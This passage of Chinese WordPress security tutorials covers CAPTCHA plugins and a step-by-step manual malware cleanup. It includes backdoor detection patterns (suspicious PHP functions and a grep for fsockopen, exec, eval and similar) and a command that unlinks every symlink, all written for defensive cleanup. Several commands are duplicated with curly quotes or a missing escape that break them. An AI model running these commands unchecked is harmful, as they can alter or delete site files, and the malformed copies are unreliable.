    Profile Builder还包括一项要求管理员批准新注册的功能,但它仅在高级版本中可用。

    小结

    如果您需要在您的WordPress网站上允许公开注册,注册垃圾邮件可能是一个令人沮丧的问题。您可以结合不同的策略减少甚至完全消除注册垃圾邮件。

    最简单、最轻量的选项是将NoCAPTCHA reCAPTCHA添加到默认的WordPress注册表单中。大多数人类访问者不会注意到任何不同,但谷歌会向机器人显示验证码测试,以防止它们注册垃圾邮件。

    如果您想要彻底检修,您还可以使用专用的WordPress注册插件来创建自定义注册表单,其中包括其自己的反垃圾邮件属性,以及新用户的管理员批准等功能。

  • 如何使用CAPTCHA验证码将机器人和垃圾邮件发送者拒之门外

    如何使用CAPTCHA验证码将机器人和垃圾邮件发送者拒之门外

    毫无疑问,WordPress的安全性很重要。毕竟,违规行为可能会对您的网站造成严重损害。但是,随着黑客使用机器人快速有效地攻击网站,您可能会觉得胜算很大。

    幸运的是,您可以使用一个非常简单的工具来阻止机器人和垃圾邮件发送者进入您的WordPress网站。结合全自动图灵测试来区分计算机和人类 (CAPTCHA) 是一种提高网站安全性的简单、省力的方法。

    本指南将向您介绍验证码以及它们如何在保护您的网站免受黑客和垃圾邮件侵害方面发挥作用。然后我们将引导您完成如何将它们添加到您的网站并介绍一些最好的WordPress CAPTCHA插件。

    1. 了解CAPTCHA验证码
    2. 什么是谷歌验证码?
    3. 如何将验证码添加到您的WordPress网站

    了解CAPTCHA验证码

    您可能已经在网上多次看到CAPTCHA。它们可以采用多种形式,其中最常见的一种是您必须破译的扭曲文本。其他要求您从一组低分辨率照片中选择符合特定规格的图像:

    图像验证码示例

    图像验证码示例

    在所有情况下,所提出的挑战是大多数人应该能够轻松完成的挑战。然而,即使是今天的先进机器人也无法理解被扭曲的文字或图像碎片。当他们无法完成测试时,他们将被您的网站(或任何其他CAPTCHA保护的)阻止。

    这很重要,因为机器人用于多种可能危及您网站的安全性和可信度的情况。蛮力攻击是最常见的黑客策略之一,它使用机器人在您的登录表单中反复输入凭据 ,直到他们获得对您网站的访问权限。

    跨站点脚本 (XSS) 是另一种类型的网络攻击,其中黑客通过表单将恶意代码注入您的站点,例如您的登录页面或评论部分。这可能会导致恶意软件存储在您的网站上、信息被盗以及其他负面结果。

    机器人还可以使用低质量链接向您的评论部分发送垃圾邮件,这些链接会损害您的搜索引擎优化 (SEO)并阻止合法用户。垃圾邮件很烦人,但更重要的是,它使您的网站看起来保护不足且监控不力。

    您网站上用户可以输入信息的任何地方——换句话说,任何形式——都容易受到机器人的攻击。在提交表单之前要求验证码可防止非人类成功访问您的网站或将恶意代码注入其中。

    什么是谷歌验证码?

    虽然CAPTCHA清楚地为您的网站提供了各种好处和保护,但它们确实有一些缺点。例如,它们往往会对用户体验 (UX) 产生负面影响。通过减慢用户的速度,这些简单的测试会阻碍访问者顺利快速地在您的网站上实现他们的目标。

    此外,有视力障碍或阅读障碍等其他挑战的用户可能会发现完成您的验证码很困难。无意中将人类用户排除在您的网站之外对您或他们都没有好处,即使它会在此过程中转移机器人。

    2014年,谷歌发布了它的No CAPTCHA reCAPTCHA,这是它自2007年以来一直使用的扭曲文字和图像测试的继承者。新系统只需要用户选择“我不是机器人”旁边的复选框来确认他们的合法性:

    WordPress登录页面上的Google reCAPTCHA复选框

    WordPress登录页面上的Google reCAPTCHA复选框

    这比更传统的CAPTCHA更容易和更快,并且可供更广泛的用户使用。更重要的是,谷歌一直在不断改进这项技术。2018年,它还发布了所谓的“隐形验证码”,无需用户进行任何故意操作即可检测机器人。

    向您的WordPress网站添加验证码时,您将有机会选择要使用的测试类型。但是,请记住,实施Google reCAPTCHA v2或v3应该有助于使您的网站对用户来说更有趣和更容易访问。

    如何将验证码添加到您的WordPress网站

    当谈到WordPress安全性时,添加验证码是让机器人更难渗透到您的网站的最简单方法之一。幸运的是,合并一个也很容易。您只需三个简单的步骤即可进行设置。

    第 1 步:安装和激活WordPress CAPTCHA插件

    将验证码添加到WordPress网站的最简单方法是使用插件。WordPress插件目录中有许多高质量的选项,因此您不必为了提高网站的安全性而倾家荡产。

    但是,在选择插件之前,需要考虑几个关键功能。

    首先,您要考虑插件提供的CAPTCHA类型。正如我们上面所讨论的,谷歌reCAPTCHA比要求访问者点击图像或解码扭曲的文本更加用户友好。

    此外,您需要确保您的插件可以将验证码添加到您网站的多个区域,而不仅仅是您的登录页面。我们将在第 3 步中更详细地探讨这个想法。现在,请记住,在您的网站上有表单的任何地方,您都可能希望使用CAPTCHA来阻止机器人。

    让我们看一下满足上述条件的三个插件。BestWebSoft的Google Captcha (reCAPTCHA) 是最受欢迎的选项,有超过200,000次活动安装:

    谷歌验证码插件

    谷歌验证码插件

    顾名思义,这个插件在您的登录和注册页面、密码重置和联系表格,甚至在您网站的评论和推荐提交中都包含 v2 或 v3 Google reCAPTCHA。除了提高安全性外,这还有助于防止垃圾邮件。

    Advanced noCaptcha & Invisible Captcha也获得了很高的评价,并包括许多相同的功能:

    高级noCaptcha插件

    高级noCaptcha插件

    该插件还提供多站点兼容性 ,并与流行的会员工具(如bbPress 和BuddyPress )集成。此外,如果需要,您可以将多个验证码添加到单个页面。

    最后,您可能还需要考虑Login No CAPTCHA reCAPTCHA

    Login No CAPTCHA reCAPTCHA插件

    Login No CAPTCHA reCAPTCHA插件

    该插件包括简单的Google reCAPTCHA,可用于登录、注册和忘记密码表单。但是,它没有与您的评论部分或联系表格集成,这使得它比我们看过的其他两个插件更受限制。

    第 2 步:创建您的Google reCAPTCHA并将其添加到您的网站

    一旦您安装并激活了您的插件,您需要创建您的Google reCAPTCHA(假设您选择了一个使用它的插件)。前往Google reCAPTCHA管理控制台,并填写注册表:

    reCAPTCHA注册页面

    reCAPTCHA注册页面

    请注意,您可以在v2或v3 reCAPTCHA之间进行选择,并且可以使用复选框或不可见的测试。后者将提供最好的用户体验,因为它不需要用户采取任何行动。但是,v2复选框往往更可靠。

    填写完所有字段后,单击Submit按钮。在下一个屏幕上,您将获得一个Site Key和一个Secret Key

    为新的Google reCAPTCHA获取站点和密钥

    为新的Google reCAPTCHA获取站点和密钥

    您需要在WordPress网站上将两者都输入到您的CAPTCHA插件设置中。此过程可能会略有不同,具体取决于您选择的插件。但是,您应该能够轻松地在仪表盘侧边栏中找到设置,并将您的密钥粘贴到相关字段中:

    将Google reCAPTCHA密钥添加到Google Captcha插件设置

    将Google reCAPTCHA密钥添加到Google Captcha插件设置

    不要忘记保存您的更改。您可能还想为您的Google reCAPTCHA管理控制台页面添加书签并定期检查。在有足够数量的实时流量访问您的网站后,您将能够查看 与表单提交请求相关的有价值的分析

    第 3 步:配置您的设置以保护关键区域

    正如我们之前提到的,有几个区域非常适合整合您的验证码,以便为您的网站提供最大程度的保护。安装您选择的插件后,您可以配置设置以确保包含所有重要页面。

    Google CAPTCHA和Advanced No Captcha都在其常规设置中包含一个复选框列表。在那里,您可以选择要使用reCAPTCHA的位置:

    选择显示Google reCAPTCHA的位置

    选择显示Google reCAPTCHA的位置

    理想情况下,这将包括您网站上的任何表格,包括易受攻击的区域,例如:

    • WordPress管理员登录页面
    • WooCommerce登录页面
    • 用户注册登记表
    • 密码恢复表格
    • 联系表

    您的网站可能包含其他独特的形式,例如用户生成的内容提交、调查或电子邮件注册。在这种情况下,您可能需要使用Advanced noCaptcha和Invisible Captcha,因为该插件提供了用于以任何形式合并Google reCAPTCHA的操作钩子 。

    或者,您可以改为投资Google Captcha (reCAPTCHA) Pro 。它提供了与流行插件的额外集成,例如JetpackMailChimp for WordPress和几个表单构建器

    将验证码添加到您的登录页面

    您的登录页面是暴力破解和跨站点脚本 (XSS) 攻击的主要目标。

    要使用Google Captcha插件向其添加CAPTCHA,请导航至Google Captcha > Settings > General > Enable reCAPTCHA for inside WordPress,然后在WordPress Default下 选择Login Form

    登录表单选项Google Captcha插件

    登录表单选项Google Captcha插件

    您的登录页面现在应该受到保护。

    在您的密码重置页面上加入验证码

    当他们尝试登录您的站点失败时,黑客可能会被引导到用户可以重置其密码的页面。要添加验证码以保护此页面,请导航至Google Captcha > Settings > General > Enable reCAPTCHA for

    Google Captcha插件中的Rest密码表单选项

    Google Captcha插件中的Rest密码表单选项

    然后, 从Reset password form中选择WordPress Default

    使用验证码保护您的WooCommerce登录页面

    您的WooCommerce登录页面与您的核心WordPress页面一样容易受到恶意攻击。要使用Google Captcha保护它,您需要插件的premium version(下方黄色部分)。准备好后,在您的WordPress仪表盘前往Google Captcha > Settings > General > Enable reCAPTCHA for中:

    (高级)WooCommerce登录表单选项

    (高级)WooCommerce登录表单选项

    在这里,您可以 从External Plugins列表中选择WooCommerce Login form

    在您的联系表上放置验证码

    与我们在本文中讨论的其他方式相同,您的联系表单可以使用CAPTCHA进行保护。但是,有几个不同的联系表单插件与Google CAPTCHA集成,包括:

    您需要在您的网站上激活上述工具之一,才能将验证码添加到您的联系表单中。然后转到Google Captcha > Settings > General > Enable reCAPTCHA for并单击您首选插件的复选框:

    Google Captcha插件中的免费和高级联系表单选项

    Google Captcha插件中的免费和高级联系表单选项

    这将完成该过程。如果您在WordPress网站上使用了另一个联系表单插件,您可能会考虑使用与其集成的其他CAPTCHA插件。还有一些表单构建器插件可以自行合并验证码,例如WPForms

    小结

    如果您想保护您的内容、您的用户和您的品牌声誉,那么将恶意机器人拒之门外是至关重要的。减慢速度的最简单方法之一是在WordPress网站的表单中添加验证码。

    将CAPTCHA添加到您的WordPress网站只需要三个步骤:

    1. 安装并激活WordPress CAPTCHA插件。
    2. 创建您的Google reCAPTCHA并将其添加到您的网站。
    3. 配置您的设置以保护关键区域。
  • WordPress恶意软件删除完整指南

    WordPress恶意软件删除完整指南

    由于WordPress的流行,它已成为网络攻击的常见目标。事实上,Alexa Top100万的40,000个WordPress网站中有70%容易受到黑客攻击。

    被黑网站的一些最常见迹象包括网页被破坏、指向恶意网站的链接、谷歌黑名单警告和白屏死机。如果这些迹象之一出现在您的WordPress网站上,则它可能已被入侵或感染了恶意软件。

    一旦您确认您正在运行一个被黑的WordPress网站,请尽快采取适当的措施来恢复它。继续阅读,因为我们将提供从被黑网站手动删除恶意软件的步骤。我们还将介绍一些可供选择的最佳WordPress安全插件。

    如何手动删除WordPress恶意软件

    虽然可以恢复被黑的WordPress网站,但该过程需要在网站维护和托管方面具备良好的技术知识。

    如果以下教程对您来说太具有挑战性,我们建议使用WordPress恶意软件清除插件或聘请WordPress恶意软件清除专家。

    步骤 1:准备删除WordPress恶意软件

    首先,请记住,您可以修复被黑的WordPress网站。虽然恢复它可能需要一些时间和精力,但要知道你可以克服这样的事件。因此,保持冷静并遵循适当的恢复程序非常重要。

    在从您的WordPress网站中删除恶意软件之前,请执行以下准备步骤以确保您的数据安全:

    1. 限制对网站的访问

    如果您的WordPress网站有恶意重定向到阴暗、不安全的网站,那么它很可能已被黑客入侵。如果不加以检查,受感染的WordPress网站可能会提示访问者访问危险网站并泄露他们的个人详细信息。

    限制对您的WordPress网站的访问将有助于防止当前感染它的隐藏恶意软件的进一步传播。通过主机控制面板的文件管理器或FTP客户端编辑.htaccess文件来执行此步骤。在本教程中,我们将在宝塔面板的的文件管理器。

    这是如何做到的:

    (1)导航到文件菜单下的文件管理器

    宝塔文件管理器

    (2)访问/www/wwwroot/yourdomain目录并向下滚动以找到.htaccess文件。如果该文件不存在,请创建一个新的.

    (3)将此代码段添加到.htaccess文件以阻止除您之外的所有访问:

    order allow,deny
    deny from all
    allow from [your_IP_address]
    order allow,deny

    deny from all

    allow from [your_IP_address]

    order allow,deny
    
    deny from all
    
    allow from [your_IP_address]

    (4)保存更改。

    Tip:确保您的IP地址是静态的。否则,您需要定期更新 .htaccess 文件。

    2. 创建备份

    创建被黑站点的备份将更容易识别恶意软件。通过将良好备份的WordPress文件与破解后版本的WordPress文件进行比较,您将能够更快地找到恶意代码。

    按照以下步骤使用宝塔面板提供的功能备份您的WordPress站点文件和数据库:

    (1)导航到“网站”菜单,找到对应的网站,点击“备份”列下方对应的操作项进行网站文件备份。

    宝塔网站文件备份

    (2)服务器完成下载准备后,可以单击下载将备份下载到本地计算机。

    宝塔网站文件备份下载

    (3)备份您的网站文件后,对您的WordPress数据库执行相同操作。单击“数据库”菜单,然后选择你需要备份数据的网站的备份列对应的操作项,即可进行数据库备份。

    宝塔网站数据库备份

    (4)如需要下载数据库备份,可以选择对应的备份文件并点击下载

    宝塔网站数据库备份下载

    3.检查可用的备份

    对于那些作为网站管理员完成尽职调查的人来说,这一步应该很容易。如果您无法使用受感染的备份文件恢复WordPress站点,则旧版本可以作为您的B计划,让您恢复黑客攻击前的数据并更快地重新开始。

    否则,我们建议您联系您的主机服务商,看看他们是否有您网站文件的备份。根据您的托管服务提供商,您可能会自动生成预破解备份文件。

    4.更新所有密码和访问密钥

    许多黑客使用恶意软件进行暴力攻击以破解管理员帐户的登录凭据。更改密码可以减慢它们的速度,并最大限度地减少另一个安全风险对您的 WordPress 网站造成严重破坏的可能性。

    确保使用强密码并避免一次在多个帐户上重复使用它们。有很多在线密码生成器,例如安全密码生成器随机密码生成器,它们可以帮助您创建具有各种字母和数字组合的不可预知的密码。

    以下是一些需要尽快重置密码的帐户:

    • 托管账户——大多数托管服务提供商,都将密码更改功能放在账户信息页面上。
    • FTP帐户– 让您的FTP帐户受到威胁,黑客可以发动FTP攻击。通过更改主帐户和辅助帐户的密码来最小化这种风险。
    • SSH帐户‒ 更改您的帐户密码和SSH密钥,以防止黑客访问您的网站数据。
    • WP-Admin 凭据‒重置您的管理员密码和有权访问您网站后端的其他WordPress用户帐户的登录凭据。
    • WP Salts——更改您的WordPress Salt密钥将有助于保持您的登录详细信息经过哈希处理,从而增强您的WordPress帐户免受暴力攻击。

    重要的!如果您的个人帐户与被黑WordPress网站的密码相同,请同时更改它们。

    5.更新WordPress

    39.3%的被黑WordPress网站运行的是过时的WordPress版本。通过使您的CMS保持最新状态,您将消除黑客可以利用来攻击您的网站的漏洞。

    以下是您需要更新的软件和文件的清单:

    • WordPress版本‒通过WordPress管理仪表板的更新选项卡将您的WordPress更新到最新版本。
    • 主题和插件——过时的WordPress插件和主题的更新提示应该出现在更新部分。不要忘记通过删除未使用的主题和插件来消除潜在的安全问题。
    • PHP版本‒ 宝塔用户可以的网站设置菜单切换更新PHP版本。

    6.检查最近的更改和访问

    您的WordPress站点日志会跟踪服务器上的所有流量和更改。在黑客入侵期间检查日志中的可疑活动可以更轻松地识别流氓帐户和受感染文件。

    首先,通过在SSH上运行find命令来分析您的变更日志:

    find . -type f -name ‘*.file_extension’ -ctime n
    find . -type f -name ‘*.file_extension’ -ctime n
    find . -type f -name '*.file_extension' -ctime n

    file_extension值替换为您要检查的文件类型。我们建议搜索JavaScript和PHP文件,因为这两个文件扩展名都是恶意软件注入的常见目标。将正值或负值添加到n占位符以确定搜索范围。

    例如,以下SSH命令显示三天前添加或修改的所有PHP文件:

    find . -type f -name ‘*.php’ -ctime -3
    find . -type f -name ‘*.php’ -ctime -3
    find . -type f -name '*.php' -ctime -3

    至于访问日志,宝塔面板用户可以通过仪表盘网站部分下的网站对应的设置,在弹出面板访问网站日志-响应日志查看它们。

    宝塔网站访问日志

    7.删除符号链接

    符号链接或符号链接是指向另一个文件或目录的文件类型,用作快捷方式。虽然它们提供了多个访问点,但黑客可以利用它们发起符号链接攻击并获得对您的根目录的访问权限。

    通过SSH运行此命令以解锁文件和目录中的符号链接:

    find . -type l -exec unlink {} ;
    find . -type l -exec unlink {} ;
    find . -type l -exec unlink {} ;

    8.重置文件和文件夹权限

    限制具有管理员角色的用户数量是防止黑客访问机密站点文件的重要安全措施。如果发生安全漏洞,我们建议将文件和文件夹权限重置为其默认值,以清除具有无效访问权限的WordPress用户。

    文件权限设置应该可以通过您的托管帐户仪表盘访问。您可以参考“WordPress文件权限”,恢复原本的文件及文件夹权限。

    推荐的755文件夹权限意味着这些文件夹中文件的所有者可以读取、写入和执行它们,而其他 WordPress 用户只有读取和执行访问权限。

    9. 使用防病毒软件扫描您的PC

    网络攻击最初可能针对您的WordPress网站,但无法确定恶意软件感染是否尚未传播到您的 PC。使用防病毒软件扫描您的 PC 将有助于消除潜在的恶意软件感染并防止它损害您的硬件。

    以下是一些带有恶意软件扫描功能的最佳防病毒解决方案:

    步骤 2:重新安装WordPress核心文件

    完成先决条件后,是时候重新安装WordPress了。如果您仍然可以访问WordPress仪表盘,请导航到更新并单击立即重新安装按钮。

    否则,您可以使用FTP客户端手动重新安装WordPress核心文件。以下参考步骤:

    (1)与您的Web服务器建立FTP连接。

    (2)在根目录中找到wp-content文件夹,右键单击它,然后选择Download

    WP-CONTENT文件下载备份

    (3)访问wordpress.org网站下载最新版本WordPress。

    (4)解压最新版本的WordPress压缩包,并上传到服务器覆盖现有的文件。

    (5)返回您的FTP客户端并刷新目录列表。将之前下载的wp-content文件夹重新上传到根目录。此步骤允许您保留插件和主题文件。

    步骤 3:比较受感染和干净的WordPress安装

    此时,您将拥有受感染和干净的WordPress文件。将这些文件放在两个单独的文件夹中,并通过您的FTP客户端比较内容。FileZilla具有目录比较功能,您可以使用它来简化流程。如果您有很多文件要处理,请考虑使用Beyond Compare

    密切注意JavaScript和PHP文件,因为它们是恶意软件的理想宿主。然后,根据需要将尽可能多的干净WordPress文件上传到网站,并定期检查网站是否正常工作。

    或者,在SSH中使用diff命令比较受感染文件夹和干净文件夹:

    diff -r wordpress-clean/ wordpress-infected/ -x wp-content
    diff -r wordpress-clean/ wordpress-infected/ -x wp-content
    diff -r wordpress-clean/ wordpress-infected/ -x wp-content

    留意最近更改或添加的任何文件。

    步骤 4:从上传中清除PHP文件

    由于恶意PHP文件可能是您网站被黑的原因,因此从您的Uploads文件夹中删除PHP文件是受损WordPress网站清理过程的重要步骤。

    您可以通过FTP客户端手动执行此操作,方法是在wp-content文件夹中找到Uploads 。像FileZilla这样的大多数FTP客户端都提供了过滤功能,这将使这个过程变得简单。另一种方法是在SSH中使用find命令:

    find . -name “*.php”
    find . -name “*.php”
    find . -name "*.php"

    步骤 5:在文件中查找后门

    黑客可能会在文件中嵌入后门,从而在您的WordPress网站中制造安全漏洞,因此删除任何携带它们的被黑文件非常重要。

    后门通常看起来类似于WordPress核心文件。wp-config.phppluginsthemeuploads文件夹中的文件是后门注入的最流行目标。

    要识别潜在的后门,请检查您的文件中是否存在以下 PHP 函数:

    • base64
    • exec
    • move_uploaded_file
    • str_rot13
    • gzuncompress
    • eval
    • stripslashes
    • system
    • assert
    • preg_replace (with /e/)

    使用以下SSH命令来检测位于您的目录中的任何被黑文件:

    find . -type f -name ‘*.php’ | xargs egrep -i “(mail|fsockopen|pfsockopen|stream_socket_client|exec|system|passthru|eval|base64_decode) *(“
    find . -type f -name ‘*.php’ | xargs egrep -i “(mail|fsockopen|pfsockopen|stream_socket_client|exec|system|passthru|eval|base64_decode) *(“
    find . -type f -name '*.php' | xargs egrep -i "(mail|fsockopen|pfsockopen|stream_socket_client|exec|system|passthru|eval|base64_decode) *("

    以下命令将定位具有后门函数的图像文件:

    find wp-content/uploads -type f -iname ‘*.jpg’ | xargs grep -i php
    find wp-content/uploads -type f -iname ‘*.jpg’ | xargs grep -i php
    find wp-content/uploads -type f -iname '*.jpg' | xargs grep -i php

    最后,使用以下命令定位受感染的iframe:

    find . -type f -name ‘*.php’| grep -i ‘<iframe’
    find . -type f -name ‘*.php’| grep -i ‘<iframe’
    find . -type f -name '*.php'| grep -i '<iframe'

    重要的!一些插件在其操作中使用这些功能,因此请务必测试所做的任何更改。我们建议下载原始插件文件并将其代码与您从被黑站点下载的文件进行比较,以避免删除基本功能。

    步骤 6:检查SQL数据库文件

    您的数据库无法免受恶意软件注入的影响。在确保您的WordPress核心和内容文件是干净的之后,下一步是仔细查看您的数据库。

    首先,使用phpMyAdmin将您的MySQL数据库导出为.sql备份文件。使用像Sublime这样的文本编辑器,检查文​​件中的恶意内容。不要从数据库备份文件中删除可疑条目。相反,请记下它们的位置并继续下一步。

    步骤 7:查看每个页面的代码并发布

    在此步骤中,查找您的问、页面和评论部分中的恶意条目。检查他们的修订历史以检测任何可疑活动。

    仔细查看在第6步中发现可疑条目的位置。使用文本编辑器删除所有恶意代码,并在需要时重新格式化内容。

    当您使用它时,请删除您在清理过程中发现的垃圾邮件。

    步骤 8:从URL拦截列表中删除您的网站

    此时,您的WordPress网站应该没有恶意代码。剩下要做的就是从Google的黑名单中删除您网站的URL。

    您可以通过Google Search Console执行此操作。导航到您的管理仪表板并打开Security & Manual Actions -> Security issues选项卡。选择I have fixed these issues -> Request a review以让Google审核并重新索引您的WordPress网站。

    请注意,Google可能需要几天时间来处理黑名单删除请求。

    验证您的网站

    考虑查看如何将域添加到Google Search Console以验证您的网站所有权并请求审核。

    最好的WordPress恶意软件删除插件

    您已经了解了手动从WordPress网站中删除恶意软件所需的步骤。如果您对自己的技术技能没有信心,请考虑使用 WordPress 恶意软件删除插件来简化清理过程。

    以下是三个可供选择的最佳WordPress安全插件。随意选择最适合您的需求和偏好的一种。

    1. WordFence Security

    WordFence Security

    WordFence Security的WordPress恶意软件扫描程序可以轻松从您的WordPress站点中删除恶意软件。该插件还包括一个计划的安全扫描功能,以自动化该过程,确保您的WordPress网站安全,而无需对您进行过多的微观管理。

    该插件带有一个Web应用程序防火墙——它是对您网站安全性的重要补充,可以阻止恶意流量并防止暴力攻击。它与恶意软件扫描程序一起工作以阻止包含恶意脚本的请求。

    此外,WordFence Security还包括登录安全功能,例如双因素身份验证和reCAPTCHA。该插件还允许您使用已知的泄露用户密码阻止登录。

    以每年99美元至950美元的价格升级到WordFence高级版,您可以访问实时IP拦截列表和国家/地区阻止功能,阻止来自您选择的恶意IP地址或国家/地区的所有请求。

    其他值得注意的高级功能包括实时恶意软件签名更新、调查和恶意软件删除、事件后黑名单删除和搜索引擎安全清理。

    2.All In One WP Security & Firewall

    All In One WP Security & Firewall

    这个WordPress安全和防火墙插件提供了用户帐户安全功能,可以检测默认的“管理员”用户名以及相同的登录名和显示名。它通过提供密码强度工具停止用户名枚举并促进强密码

    登录和用户注册安全功能带有暴力保护、自动强制注销和IP锁定。您可以监控所有用户的帐户活动,包括失败的登录尝试,并将某些IP地址列入白名单。

    其他WordPress安全功能包括添加自定义WP前缀、计划的自动数据库备份、.htaccesswp-config.php文件备份以及文件更改检测扫描程序的能力。

    简而言之,All In One WP Security & Firewall是最好的免费插件之一,可以从被黑网站中删除恶意软件并防止未来的恶意软件攻击。

    3.Sucuri Security

    Sucuri Security

    与WordFence安全插件一样,Sucuri有免费和高级版本。免费插件提供基本的WordPress安全功能,如文件完整性监控、安全强化和活动审计、远程恶意软件扫描、黑名单监控和黑客攻击后安全措施。不幸的是,网站防火墙是为高级用户保留的。

    高级版每年收费199.99至499.99美元,并由Sucuri安全专家提供无限制的恶意软件和黑客清除功能。所有计划都包括基于云的Web应用程序防火墙、每30分钟到12小时的网站安全扫描以及清理后的基本报告。

    Sucuri还可以在您的WordPress网站被列入黑名单时通知您,并代表您提交删除请求。CDN速度增强功能将在恶意软件感染后提高您的搜索引擎排名。

    购买WordPress恶意软件删除服务

    各种WordPress插件提供一流的功能,可以从WordPress网站中删除恶意软件,并保护它们免受未来的恶意软件感染。但是,在处理复杂的恶意软件时,可能需要专业的帮助。

    如果您缺乏执行上述流程所需的技术专长,建议您购买WordPress安全服务。

    WordPress安全专家可以确保恶意软件删除过程正确完成。此外,您可以让他们修补您的WordPress网站的安全漏洞,以确保其以最佳方式运行。

    UpworkFiverrCodeable等自由职业者平台托管了大量的专业WordPress专家可供租用。以下是一些提示,可帮助您找到WordPress恶意软件清除专家:

    • 写一份清晰的工作描述——这样做将有助于设定期望、预算和所需技能。
    • 仔细审查应聘者的作品集——深入了解应聘者的过往经历将使您更好地了解他们的技能、专业知识以及他们是否能够胜任这项任务。
    • 浏览过去的客户评论——确保候选人的职业道德和沟通方式符合您的偏好。一个好的承包商应该为您提供定期的状态更新,并对整个过程保持透明。
    • 使用参考‒ 请您的朋友或联系人推荐与他们合作过的值得信赖的专家。

    保护您的网站

    考虑查看如何保护WordPress指南,以帮助您识别和修补站点中的安全漏洞。

    小结

    可以通过多种方式从您的WordPress网站中删除恶意软件。如果您具有执行清理过程所需的技术专长和时间,则可以手动执行此操作。

    WordPress安全插件可以简化流程并添加额外的安全措施以防止未来的恶意软件攻击。如果一切都失败了,您可以聘请WordPress安全专家为您完成工作。

    无论首选方法如何,最好尽快采取行动。虽然可以恢复被黑的网站,但如果不加以修复,网络攻击可能会损害其搜索引擎排名和您的品牌声誉。